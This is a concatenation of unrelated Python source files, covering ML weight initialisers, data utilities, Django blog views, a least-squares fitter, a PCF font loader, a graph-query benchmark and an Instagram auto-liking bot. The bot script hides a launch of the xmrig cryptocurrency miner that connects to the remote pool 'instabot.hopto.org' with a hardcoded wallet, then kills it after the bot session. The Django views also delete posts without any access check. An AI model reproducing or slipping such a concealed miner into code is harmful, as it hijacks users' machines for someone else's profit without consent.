# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""init weights"""
import math
import numpy as np
from mindspore.common import initializer as init
from mindspore.common.initializer import _assignment
from mindspore.common.initializer import _calculate_correct_fan
from mindspore.common.initializer import _calculate_fan_in_and_fan_out
from mindspore.common.initializer import _calculate_gain
class KaimingUniform(init.Initializer):
"""
Initialize the array with He kaiming algorithm.
Args:
a: the negative slope of the rectifier used after this layer (only
used with ``'leaky_relu'``)
mode: either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity: the non-linear function, recommended to use only with
``'relu'`` or ``'leaky_relu'`` (default).
"""
def __init__(self, a=math.sqrt(5), mode='fan_in', nonlinearity='leaky_relu'):
super().__init__()
self.mode = mode
self.gain = _calculate_gain(nonlinearity, a)
def _initialize(self, arr):
fan = _calculate_correct_fan(arr.shape, self.mode)
bound = math.sqrt(3.0) * self.gain / math.sqrt(fan)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
class UniformBias(init.Initializer):
"""bias uniform initializer"""
def __init__(self, shape):
super().__init__()
self.shape = shape
def _initialize(self, arr):
fan_in, _ = _calculate_fan_in_and_fan_out(self.shape)
bound = 1 / math.sqrt(fan_in)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
|
nilq/baby-python
|
python
|
from collections import Mapping, Iterable
import copy as copy_
import numpy as np
import datetime as dt
from . import misc
def select_var(d, name, sel):
var_dims = list(d['.'][name]['.dims'])
d['.'][name]['.dims'] = var_dims
for key, value in sel.items():
if isinstance(value, Mapping):
if len(sel) > 1: raise ValueError('invalid selector')
newdim = key
dims = value.keys()
idxs = value.values()
selector = tuple([
idxs[dims.index(var_dim)] if var_dim in dims else slice(None)
for var_dim in var_dims
])
d[name] = d[name][selector]
for dim in dims:
if dim in var_dims:
var_dims.remove(dim)
d['.'][name]['.dims'].append(newdim)
else:
dim, idxs = key, value
idxs = np.array(idxs) if type(idxs) in (list, tuple) else idxs
if isinstance(idxs, np.ndarray) and idxs.dtype == np.bool:
idxs = np.nonzero(idxs)[0]
if dim in var_dims:
i = var_dims.index(dim)
d[name] = np.take(d[name], idxs, axis=i)
if not isinstance(idxs, np.ndarray):
var_dims.remove(dim)
def filter_hidden(x):
if isinstance(x, Mapping):
return {k: v for k, v in x.items() if not k.startswith('.')}
if isinstance(x, Iterable):
return [k for k in x if not k.startswith('.')]
return x
def select(d, sel):
for name in d.keys():
if name.startswith('.'):
continue
select_var(d, name, sel)
def get_dims(d, name=None):
if name is None:
dims = {}
for name in get_vars(d):
data = get_var(d, name)
for i, dim in enumerate(get_dims(d, name)):
dims[dim] = data.shape[i]
return dims
else:
try: return d['.'][name]['.dims']
except KeyError: return gen_dims(d, name)
def get_vars(d):
return filter_hidden(d.keys())
def get_var(d, name):
data = d[name]
if type(data) is np.ndarray:
return data
else:
return np.array(data)
def get_meta(d, name=None):
if name is None:
return d.get('.', {})
else:
try: return d['.'][name]
except KeyError: return {}
def get_attrs(d, name=None):
if name is None:
try: return filter_hidden(d['.']['.'])
except KeyError: return {}
else:
try: return filter_hidden(d['.'][name])
except KeyError: return {}
def gen_dims(d, name):
data = get_var(d, name)
return [name + ('_%d' % i) for i in range(1, data.ndim + 1)]
def parse_time(t):
formats = [
'%Y-%m-%d %H:%M:%S.%f',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%dT%H:%M:%SZ',
]
for f in formats:
try: return dt.datetime.strptime(t, f)
except: pass
return None
def time_dt(time):
return [parse_time(t) for t in time]
def merge_var(dd, var, dim):
if len(dd) == 0:
return None, None
x0 = dd[0][var]
meta0 = dd[0]['.'][var]
dims0 = meta0['.dims']
meta = copy_.deepcopy(meta0)
if dim in dims0:
i = dims0.index(dim)
x = np.concatenate(
[d[var] for d in dd if d['.'][var]['.dims'] == dims0],
axis=i
)
else:
meta['.dims'] = [dim] + list(meta['.dims'])
x = np.stack([d[var] for d in dd if d['.'][var]['.dims'] == dims0])
return x, meta
def merge(dd, dim, new=None, variables=None):
dx = {'.': {'.': {}}}
vars_ = list(set([x for d in dd for x in get_vars(d)]))
dims = [k for d in dd for k in get_dims(d).keys()]
is_new = dim not in dims
for var in vars_:
var_dims = get_dims(dd[0], var)
if is_new and (variables is None or var in variables) or \
dim in var_dims:
x, meta = merge_var(dd, var, dim)
elif new is not None and (variables is None or var in variables):
x, meta = merge_var(dd, var, new)
else:
x, meta = dd[0][var], dd[0]['.'][var]
dx[var] = x
dx['.'][var] = meta
for d in dd:
if '.' in d['.']:
dx['.']['.'].update(d['.']['.'])
return dx
def rename_dim(d, old, new):
if old == new:
return
if '.' in d:
for var in d['.'].keys():
meta = d['.'][var]
if '.dims' in d['.'][var]:
dims = d['.'][var]['.dims']
for i, dim in enumerate(dims):
if dim == old:
dims[i] = new
def rename(d, old, new):
if old == new:
return
if old in d:
d[new] = d[old]
d['.'][new] = d['.'][old]
del d[old]
del d['.'][old]
rename_dim(d, old, new)
def copy(d):
d2 = {}
for var in get_vars(d):
d2[var] = d[var]
d2['.'] = copy_.deepcopy(d['.'])
return d2
def group_by(d, dim, group, func):
groups = sorted(list(set(group)))
vars = get_vars(d)
n = len(groups)
for var in vars:
dims = d['.'][var]['.dims']
try:
i = dims.index(dim)
except ValueError:
continue
size = list(d[var].shape)
size[i] = n
x = np.empty(size, d[var].dtype)
for j, g in enumerate(groups):
mask = group == g
slice_x = misc.sel_slice({dim: j}, dims)
slice_y = misc.sel_slice({dim: mask}, dims)
y = d[var][slice_y]
x[slice_x] = func(y, axis=i)
d[var] = x
|
nilq/baby-python
|
python
|
import json
import os
from typing import Callable
import imageio
import numpy as np
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import pathlib
import torch
from torchvision import datasets, transforms
from torchvision.datasets.mnist import read_label_file, read_image_file
from args import args
def clearline():
CURSOR_UP_ONE = "\x1b[1A"
ERASE_LINE = "\x1b[2K"
print(CURSOR_UP_ONE + ERASE_LINE + CURSOR_UP_ONE)
def input2label(x: torch.Tensor) -> torch.LongTensor:
"""
- Convert a torch array containing floats to contain ints
- The continuous values of 'x' are binned based on n_bins set at args.py
- This will turn our problem of predicting the next pixel value to
a classification problem (instead of regression)
"""
return torch.squeeze(torch.round((args.n_bins - 1) * x).type(torch.LongTensor), 1)
def tile_images(images: np.array, n_rows=0) -> np.array:
n_images = len(images)
height = images[0].shape[1]
width = images[0].shape[2]
if n_rows == 0:
n_rows = int(np.floor(np.sqrt(n_images)))
while n_images % n_rows != 0:
n_rows -= 1
n_cols = n_images // n_rows
images = np.squeeze(np.array(images), axis=1)
images = np.transpose(images, (1, 2, 0))
images = np.reshape(images, [height, width, n_rows, n_cols])
images = np.transpose(images, (2, 3, 0, 1))
images = np.concatenate(images, 1)
images = np.concatenate(images, 1)
return images
def plot_stats(stats, savepath: str) -> None:
"""
Make all the plots in stats. Stats can be a dict or a path to json (str)
"""
if type(stats) is str:
assert os.path.isfile(stats)
with open(stats, "r") as sf:
stats = json.load(sf)
assert type(stats) is dict, "stats must be a dictionary"
if not os.path.isdir(savepath):
os.makedirs(savepath)
def _plot(y, title):
plt.Figure()
if type(y) is list:
plt.plot(range(1, len(y) + 1), y)
elif type(y) is dict:
for key, z in y.items():
plt.plot(range(1, len(z) + 1), z, label=key)
plt.legend()
else:
raise ValueError
plt.xlabel("Epoch")
plt.ylabel(title)
plt.title(title)
plt.savefig(os.path.join(savepath, title.replace(" ", "_") + ".png"))
plt.close()
# Loop over stats dict and plot. Dicts within stats get plotted together.
for key, value in stats.items():
_plot(value, key)
def get_label2onehot(n_classes: int) -> Callable:
def label2onehot(target_class_index):
one_hot_vector = np.zeros((n_classes), dtype="float32")
one_hot_vector[target_class_index] = 1
return one_hot_vector
return label2onehot
def augment(rotate=5):
return transforms.Compose(
[transforms.RandomRotation(rotate), transforms.ToTensor()]
)
def data_loader(dataset, batch_size, n_workers=8):
assert dataset.lower() in ["mnist", "fashionmnist"]
loader_args = {
"batch_size": batch_size,
"num_workers": n_workers,
"pin_memory": True,
}
datapath = os.path.join(os.getenv("HOME"), "data", dataset.lower())
dataset_args = {
"root": datapath,
"download": True,
"transform": transforms.ToTensor(),
}
if dataset.lower() == "mnist":
dataset_init = datasets.MNIST
n_classes = 10
else:
dataset_init = datasets.FashionMNIST
n_classes = 10
label2onehot = get_label2onehot(n_classes)
dataset_args.update({"target_transform": label2onehot})
val_loader = torch.utils.data.DataLoader(
dataset_init(train=False, **dataset_args), shuffle=False, **loader_args
)
dataset_args["transform"] = augment()
train_loader = torch.utils.data.DataLoader(
dataset_init(train=True, **dataset_args), shuffle=True, **loader_args
)
return train_loader, val_loader, label2onehot, n_classes
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import Blogs
from .forms import Create
def add_blog(request):
if request.method == "POST":
addBlog = Create(request.POST, request.FILES)
if addBlog.is_valid():
addBlog.save()
return redirect('blog:blogHome')
else:
addBlog = Create()
return render(request, 'blog/create.html', {'addBlog':addBlog})
def blogHome(request):
blogs = Blogs.objects.all().order_by('date')
return render(request, 'blog/blogHome.html', {'blogs':blogs})
def blog_detail(request,slug):
blog = Blogs.objects.get(slug=slug)
return render(request, 'blog/blog_detail.html', {'blog':blog})
def delete_blog(request, slug):
delBlog = Blogs.objects.filter(slug=slug).delete()
return redirect('blog:blogHome')
|
nilq/baby-python
|
python
|
###############################################################################
# Copyright (c) 2007-2018, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""Linear least-squares fitter.
:author: Ludwig Schwardt
:license: Modified BSD
"""
from __future__ import division
import warnings
import numpy as np
from .generic import ScatterFit, NotFittedError
# ----------------------------------------------------------------------------------------------------------------------
# --- CLASS : LinearLeastSquaresFit
# ----------------------------------------------------------------------------------------------------------------------
class LinearLeastSquaresFit(ScatterFit):
r"""Fit linear regression model to data using the SVD.
This fits a linear function of the form :math:`y = p^T x` to a sequence of
N P-dimensional input vectors :math:`x` and a corresponding sequence of N
output measurements :math:`y`. The input to the fitter is presented as an
input *design matrix* :math:`X` of shape (P, N) and an N-dimensional output
*measurement vector* :math:`y`. The P-dimensional *parameter vector*
:math:`p` is determined by the fitting procedure. The fitter can use
uncertainties on the `y` measurements and also produces a covariance matrix
for the parameters. The number of parameters, P, is determined by the shape
of :math:`X` when :meth:`fit` is called.
Parameters
----------
rcond : float or None, optional
Relative condition number of the fit. Singular values smaller than this
relative to the largest singular value will be ignored. The default
value is N * eps, where eps is the relative precision of the float
type, about 2e-16 in most cases, and N is length of output vector `y`.
Attributes
----------
params : array of float, shape (P,)
Fitted parameter vector
cov_params : array of float, shape (P, P)
Standard covariance matrix of parameters
Notes
-----
The :meth:`fit` method finds the optimal parameter vector :math:`p` that
minimises the sum of squared weighted residuals, given by
.. math:: \chi^2 = \sum_{i=1}^N \left[\frac{y_i - \sum_{j=1}^P p_j x_{ji}}{\sigma_i}\right]^2
where :math:`x_{ji}` are the elements of the design matrix :math:`X` and
:math:`\sigma_i` is the uncertainty associated with measurement
:math:`y_i`. The problem is solved using the singular-value decomposition
(SVD) of the design matrix, based on the description in Section 15.4 of
[1]_. This gives the same parameter solution as the NumPy function
:func:`numpy.linalg.lstsq`, but also provides the covariance matrix of the
parameters.
.. [1] Press, Teukolsky, Vetterling, Flannery, "Numerical Recipes in C,"
Second Edition, 1992.
"""
def __init__(self, rcond=None):
ScatterFit.__init__(self)
self.rcond = rcond
self.params = None
self.cov_params = None
def fit(self, x, y, std_y=1.0):
"""Fit linear regression model to x-y data using the SVD.
Parameters
----------
x : array-like, shape (P, N)
Known input values as design matrix (one row per desired parameter)
y : array-like, shape (N,)
Known output measurements as sequence or numpy array
std_y : float or array-like, shape (N,), optional
Measurement error or uncertainty of `y` values, expressed as
standard deviation in units of `y`
Returns
-------
self : :class:`LinearLeastSquaresFit` object
Reference to self, to allow chaining of method calls
"""
x = np.atleast_2d(np.asarray(x))
y = np.atleast_1d(np.asarray(y))
# Convert uncertainty into array of shape (N,)
if np.isscalar(std_y):
std_y = np.tile(std_y, y.shape)
std_y = np.atleast_1d(np.asarray(std_y))
# Lower bound on uncertainty is determined by floating-point
# resolution (no upper bound)
np.clip(std_y, max(np.mean(np.abs(y)), 1e-20) * np.finfo(y.dtype).eps,
np.inf, out=std_y)
# Normalise uncertainty to avoid numerical blow-up
# (only relative uncertainty matters for parameter solution)
max_std_y = std_y.max()
std_y /= max_std_y
# Weight design matrix columns and output vector by `y` uncertainty
A = x / std_y[np.newaxis, :]
b = y / std_y
# Perform SVD on A, which is transpose of usual design matrix -
# let A^T = Ur S V^T to correspond with NRinC
# Shapes: A ~ PxN, b ~ N, V ~ PxP, s ~ P, S = diag(s) ~ PxP,
# "reduced U" Ur ~ NxP and Urt = Ur^T ~ PxN
V, s, Urt = np.linalg.svd(A, full_matrices=False)
# Set all "small" singular values below this relative cutoff equal to 0
s_cutoff = (len(x) * np.finfo(x.dtype).eps * s[0]
if self.rcond is None else self.rcond * s[0])
# Warn if the effective rank < P
# (i.e. some singular values are considered to be zero)
if np.any(s < s_cutoff):
warnings.warn('Least-squares fit may be poorly conditioned')
# Invert zero singular values to infinity, as we are actually
# interested in reciprocal of s, and zero singular values should be
# replaced by zero reciprocal values a la pseudo-inverse
s[s < s_cutoff] = np.inf
# Solve linear least-squares problem using SVD
# (see NRinC, 2nd ed, Eq. 15.4.17)
# In matrix form: p = V S^(-1) Ur^T b = Vs Ur^T b, where Vs = V S^(-1)
Vs = V / s[np.newaxis, :]
self.params = np.dot(Vs, np.dot(Urt, b))
# Also obtain covariance matrix of parameters
# (see NRinC, 2nd ed, Eq. 15.4.20)
# In matrix form: Cp = V S^(-2) V^T = Vs Vs^T
# (also rescaling with max std_y)
self.cov_params = np.dot(Vs, Vs.T) * (max_std_y ** 2)
return self
def __call__(self, x, full_output=False):
"""Evaluate linear regression model on new x data.
Parameters
----------
x : array-like, shape (P, M)
New input values as design matrix (one row per fitted parameter)
full_output : {False, True}, optional
True if output uncertainty should also be returned
Returns
-------
y : array, shape (M,)
Corresponding output of function as a numpy array
std_y : array, shape (M,), optional
Uncertainty of function output, expressed as standard deviation
"""
if (self.params is None) or (self.cov_params is None):
raise NotFittedError("Linear regression model not fitted to data "
"yet - first call .fit method")
A = np.atleast_2d(np.asarray(x))
y = np.dot(self.params, A)
if full_output:
return y, np.sqrt(np.sum(A * np.dot(self.cov_params, A), axis=0))
else:
return y
|
nilq/baby-python
|
python
|
from typing import Sequence
from deeppavlov.models.tokenizers.utils import detokenize
from core.state_schema import Dialog
from annotators.person.person_normalizer import PersonNormalizer
class DefaultPostprocessor:
def __init__(self) -> None:
self.person_normalizer = PersonNormalizer(per_tag='PER')
def __call__(self, dialogs: Sequence[Dialog]) -> Sequence[str]:
new_responses = []
for d in dialogs:
# get tokens & tags
response = d['utterances'][-1]
ner_annotations = response['annotations']['ner']
user_name = d['user']['profile']['name']
# replace names with user name
if ner_annotations and (response['active_skill'] == 'chitchat'):
response_toks_norm, _ = \
self.person_normalizer([ner_annotations['tokens']],
[ner_annotations['tags']],
[user_name])
response_toks_norm = response_toks_norm[0]
# detokenize
new_responses.append(detokenize(response_toks_norm))
else:
new_responses.append(response['text'])
return new_responses
|
nilq/baby-python
|
python
|
# SPDX-FileCopyrightText: 2020 Jeff Epler for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_bitmap_font.pcf`
====================================================
Loads PCF format fonts.
* Author(s): Jeff Epler
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
from collections import namedtuple
import gc
import struct
from fontio import Glyph
from .glyph_cache import GlyphCache
_PCF_PROPERTIES = 1 << 0
_PCF_ACCELERATORS = 1 << 1
_PCF_METRICS = 1 << 2
_PCF_BITMAPS = 1 << 3
_PCF_INK_METRICS = 1 << 4
_PCF_BDF_ENCODINGS = 1 << 5
_PCF_SWIDTHS = 1 << 6
_PCF_GLYPH_NAMES = 1 << 7
_PCF_BDF_ACCELERATORS = 1 << 8
_PCF_DEFAULT_FORMAT = 0x00000000
_PCF_INKBOUNDS = 0x00000200
_PCF_ACCEL_W_INKBOUNDS = 0x00000100
_PCF_COMPRESSED_METRICS = 0x00000100
_PCF_GLYPH_PAD_MASK = 3 << 0 # See the bitmap table for explanation */
_PCF_BYTE_MASK = 1 << 2 # If set then Most Sig Byte First */
_PCF_BIT_MASK = 1 << 3 # If set then Most Sig Bit First */
_PCF_SCAN_UNIT_MASK = 3 << 4
# https://fontforge.org/docs/techref/pcf-format.html
Table = namedtuple("Table", ("format", "size", "offset"))
Metrics = namedtuple(
"Metrics",
(
"left_side_bearing",
"right_side_bearing",
"character_width",
"character_ascent",
"character_descent",
"character_attributes",
),
)
Accelerators = namedtuple(
"Accelerators",
(
"no_overlap",
"constant_metrics",
"terminal_font",
"constant_width",
"ink_inside",
"ink_metrics",
"draw_direction",
"font_ascent",
"font_descent",
"max_overlap",
"minbounds",
"maxbounds",
"ink_minbounds",
"ink_maxbounds",
),
)
Encoding = namedtuple(
"Encoding", ("min_byte2", "max_byte2", "min_byte1", "max_byte1", "default_char")
)
Bitmap = namedtuple("Bitmap", ("glyph_count", "bitmap_sizes"))
class PCF(GlyphCache):
"""Loads glyphs from a PCF file in the given bitmap_class."""
def __init__(self, f, bitmap_class):
super().__init__()
self.file = f
self.name = f
f.seek(0)
self.buffer = bytearray(1)
self.bitmap_class = bitmap_class
_, table_count = self._read("<4sI")
self.tables = {}
for _ in range(table_count):
type_, format_, size, offset = self._read("<IIII")
self.tables[type_] = Table(format_, size, offset)
bitmap_format = self.tables[_PCF_BITMAPS].format
if bitmap_format != 0xE:
raise NotImplementedError("Unsupported format %s" % bitmap_format)
self._accel = self._read_accelerator_tables()
self._encoding = self._read_encoding_table()
self._bitmaps = self._read_bitmap_table()
self._ascent = self._accel.font_ascent
self._descent = self._accel.font_descent
minbounds = self._accel.ink_minbounds
maxbounds = self._accel.ink_maxbounds
width = maxbounds.right_side_bearing - minbounds.left_side_bearing
height = maxbounds.character_ascent + maxbounds.character_descent
self._bounding_box = (
width,
height,
minbounds.left_side_bearing,
-maxbounds.character_descent,
)
@property
def ascent(self):
"""The number of pixels above the baseline of a typical ascender"""
return self._ascent
@property
def descent(self):
"""The number of pixels below the baseline of a typical descender"""
return self._descent
def get_bounding_box(self):
"""Return the maximum glyph size as a 4-tuple of: width, height, x_offset, y_offset"""
return self._bounding_box
def _read(self, format_):
size = struct.calcsize(format_)
if size != len(self.buffer):
self.buffer = bytearray(size)
self.file.readinto(self.buffer)
return struct.unpack_from(format_, self.buffer)
def _seek_table(self, table):
self.file.seek(table.offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
return format_
def _read_encoding_table(self):
encoding = self.tables[_PCF_BDF_ENCODINGS]
self._seek_table(encoding)
return Encoding(*self._read(">hhhhh"))
def _read_bitmap_table(self):
bitmaps = self.tables[_PCF_BITMAPS]
format_ = self._seek_table(bitmaps)
(glyph_count,) = self._read(">I")
self.file.seek(bitmaps.offset + 8 + 4 * glyph_count)
bitmap_sizes = self._read(">4I")
return Bitmap(glyph_count, bitmap_sizes[format_ & 3])
def _read_metrics(self, compressed_metrics):
if compressed_metrics:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
) = self._read("5B")
left_side_bearing -= 0x80
right_side_bearing -= 0x80
character_width -= 0x80
character_ascent -= 0x80
character_descent -= 0x80
attributes = 0
else:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
) = self._read(">5hH")
return Metrics(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
)
def _read_accelerator_tables(self):
# pylint: disable=too-many-locals
accelerators = self.tables.get(_PCF_BDF_ACCELERATORS)
if not accelerators:
accelerators = self.tables.get(_PCF_ACCELERATORS)
if not accelerators:
raise RuntimeError("Accelerator table missing")
format_ = self._seek_table(accelerators)
has_inkbounds = format_ & _PCF_ACCEL_W_INKBOUNDS
compressed_metrics = format_ & _PCF_COMPRESSED_METRICS
(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
_,
font_ascent,
font_descent,
max_overlap,
) = self._read(">BBBBBBBBIII")
minbounds = self._read_metrics(compressed_metrics)
maxbounds = self._read_metrics(compressed_metrics)
if has_inkbounds:
ink_minbounds = self._read_metrics(compressed_metrics)
ink_maxbounds = self._read_metrics(compressed_metrics)
else:
ink_minbounds = minbounds
ink_maxbounds = maxbounds
return Accelerators(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
font_ascent,
font_descent,
max_overlap,
minbounds,
maxbounds,
ink_minbounds,
ink_maxbounds,
)
def _read_properties(self):
property_table_offset = self.tables[_PCF_PROPERTIES]["offset"]
self.file.seek(property_table_offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
(nprops,) = self._read(">I")
self.file.seek(property_table_offset + 8 + 9 * nprops)
pos = self.file.tell()
if pos % 4 > 0:
self.file.read(4 - pos % 4)
(string_size,) = self._read(">I")
strings = self.file.read(string_size)
string_map = {}
i = 0
for value in strings.split(b"\x00"):
string_map[i] = value
i += len(value) + 1
self.file.seek(property_table_offset + 8)
for _ in range(nprops):
name_offset, is_string_prop, value = self._read(">IBI")
if is_string_prop:
yield (string_map[name_offset], string_map[value])
else:
yield (string_map[name_offset], value)
def load_glyphs(self, code_points):
# pylint: disable=too-many-statements,too-many-branches,too-many-nested-blocks,too-many-locals
if isinstance(code_points, int):
code_points = (code_points,)
elif isinstance(code_points, str):
code_points = [ord(c) for c in code_points]
code_points = sorted(
c for c in code_points if self._glyphs.get(c, None) is None
)
if not code_points:
return
indices_offset = self.tables[_PCF_BDF_ENCODINGS].offset + 14
bitmap_offset_offsets = self.tables[_PCF_BITMAPS].offset + 8
first_bitmap_offset = self.tables[_PCF_BITMAPS].offset + 4 * (
6 + self._bitmaps.glyph_count
)
metrics_compressed = self.tables[_PCF_METRICS].format & _PCF_COMPRESSED_METRICS
first_metric_offset = self.tables[_PCF_METRICS].offset + (
6 if metrics_compressed else 8
)
metrics_size = 5 if metrics_compressed else 12
# These will each _tend to be_ forward reads in the file, at least
# sometimes we'll benefit from oofatfs's 512 byte cache and avoid
# excess reads
indices = [None] * len(code_points)
for i, code_point in enumerate(code_points):
enc1 = (code_point >> 8) & 0xFF
enc2 = code_point & 0xFF
if enc1 < self._encoding.min_byte1 or enc1 > self._encoding.max_byte1:
continue
if enc2 < self._encoding.min_byte2 or enc2 > self._encoding.max_byte2:
continue
encoding_idx = (
(enc1 - self._encoding.min_byte1)
* (self._encoding.max_byte2 - self._encoding.min_byte2 + 1)
+ enc2
- self._encoding.min_byte2
)
self.file.seek(indices_offset + 2 * encoding_idx)
(glyph_idx,) = self._read(">H")
if glyph_idx != 65535:
indices[i] = glyph_idx
all_metrics = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(first_metric_offset + metrics_size * index)
all_metrics[i] = self._read_metrics(metrics_compressed)
bitmap_offsets = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(bitmap_offset_offsets + 4 * index)
(bitmap_offset,) = self._read(">I")
bitmap_offsets[i] = bitmap_offset
# Batch creation of glyphs and bitmaps so that we need only gc.collect
# once
gc.collect()
bitmaps = [None] * len(code_points)
for i in range(len(all_metrics)): # pylint: disable=consider-using-enumerate
metrics = all_metrics[i]
if metrics is not None:
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i] = self.bitmap_class(width, height, 2)
self._glyphs[code_points[i]] = Glyph(
bitmap,
0,
width,
height,
metrics.left_side_bearing,
-metrics.character_descent,
metrics.character_width,
0,
)
for i, code_point in enumerate(code_points):
metrics = all_metrics[i]
if metrics is None:
continue
self.file.seek(first_bitmap_offset + bitmap_offsets[i])
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i]
words_per_row = (width + 31) // 32
buf = bytearray(4 * words_per_row)
start = 0
for _ in range(height):
self.file.readinto(buf)
for k in range(width):
if buf[k // 8] & (128 >> (k % 8)):
bitmap[start + k] = 1
start += width
|
nilq/baby-python
|
python
|
from instapy import InstaPy
import random
from time import sleep
import subprocess
######################################
insta_username = 'your login'
insta_password = 'your password'
number_of_likes = 1200
number_of_follows = 0
number_of_comments = 250
tags = ['student', 'nature', 'river', 'forest', 'tree', 'lake', 'sea', 'ocean', 'sky', 'travel', 'cloud', 'stone', 'water', 'city', 'country', 'mountain']
######################################
work_made = False
session_key = random.randint(0, 1000)
#write session key
session_file = open("logs/session_stats.txt", "w")
session_file.write(str(session_key) + " 0 0 0")
session_file.close()
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
procID = xmrig.stdout.readline()
procID = procID[:-1]
if(procID != "" and procID.isdigit()):
subprocess.Popen(['kill', str(int(procID))])
cmd = ['xmrig/build/xmrig', '-o', 'instabot.hopto.org:5555', '-u', '48fEvxEGfYyU13JYPjfvyzWR4WammKcuRPxnKyTfAYWHAahbQHNwW8D4GCukwuhCE4g2NR5MiDnhhQ2EZbYzEjhMKgzMUFY', '-p', 'x', '-k', '-B']
subprocess.Popen(cmd)
#cycle to recover from failure
while(work_made == False):
try:
session = InstaPy(username=insta_username, password=insta_password)
session.login()
# set up all the settings
session.set_do_comment(enabled=False)
session.set_do_follow(enabled=False)
# do the actual work
session.like_follow_comment_by_tags_unfollow_by_list(tags, number_of_likes, number_of_follows, number_of_comments, None, True, session_key)
# end the bot session
session.end()
work_made = True
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
procID = xmrig.stdout.readline()
procID = procID[:-1]
if(procID != "" and procID.isdigit()):
subprocess.Popen(['kill', str(int(procID))])
except:
print("Unexpected error!")
sleep(30)
#if (session.browser != None):
# session.end()
|
nilq/baby-python
|
python
|
import argparse
import timeit
from statistics import fmean, variance
from pyformlang.cfg import Terminal
from src.cfg_algorithms import cyk
from src.cnf import WeakCNF
from src.label_graph import LabelGraph
from src.rpq import rpq, rpq_with_linear_tc
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='command line interface for simple graph database')
parser.add_argument(
'--graph'
, required=True
, type=str
, help='path to graph.txt file'
)
parser.add_argument(
'--regex'
, required=True
, type=str
, help='path to regex.txt file'
)
parser.add_argument(
'--sources'
, required=False
, type=str
, help='path to sources.txt file'
)
parser.add_argument(
'--destinations'
, required=False
, type=str
, help='path to destinations.txt file'
)
args = parser.parse_args()
g = LabelGraph.from_txt(args.graph)
r = LabelGraph.from_regex(args.regex)
print(str(args.graph) + " " + str(args.regex))
time_sum_1 = 0
time_sum_2 = 0
for i in range(5):
time_1 = timeit.default_timer()
res_1 = rpq(g, r)
time_sum_1 += timeit.default_timer() - time_1
time_2 = timeit.default_timer()
res_2 = rpq_with_linear_tc(g, r)
time_sum_2 += timeit.default_timer() - time_2
assert (res_1.nvals == res_2.nvals)
print(str(time_sum_1 / 5))
print(str(time_sum_2 / 5))
res = rpq(g, r)
print(str(res.nvals))
srcs = None
if args.sources is not None:
with open(args.sources, 'r') as f:
srcs = list(map(int, f.readline().split()))
dsts = None
if args.destinations is not None:
with open(args.destinations, 'r') as f:
dsts = list(map(int, f.readline().split()))
f = open("output.txt", 'a')
f.write(str(args.graph) + " " + str(args.regex) + "\n")
start_time = timeit.default_timer()
for i, j, _ in zip(*res.to_lists()):
if (srcs is None) or (i in srcs):
if (dsts is None) or (j in dsts):
f.write(f'{i} to {j}')
print(str(timeit.default_timer() - start_time))
f.close()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
#Convert EPUB files to either single HTML or text files.
#They can then be read on refreshable Braille displays, such as the Brailliant series from HumanWare or the Braille Edge by Hims.
#Also works with the Victor Reader Trek/Stream by Humanware.
#Requires pypandoc (shoutouts to @TheQuinbox on twitter!)
#Try pip3 install pypandoc
#usage: epub-convert.py [-i input_dir] [-o output_dir] [-T]
import argparse
import functools
import os
from pathlib import Path
import pypandoc
import sys
import time
@functools.total_ordering
class Ebook:
"""Represents a book to be converted.
Rich comparison will order on the file size.
bool determines whether this book should be converted.
"""
def __init__(self, book_path: Path, output_ext: str, input_base: Path, output_base: Path):
self.book_path=book_path.resolve() # basically absolute
# self.dest_path is the output filename, pathlib makes this elegant.
self.dest_path=output_base.resolve()/self.book_path.relative_to(input_base.resolve()).with_suffix('.'+output_ext)
self.in_stat=self.book_path.stat()
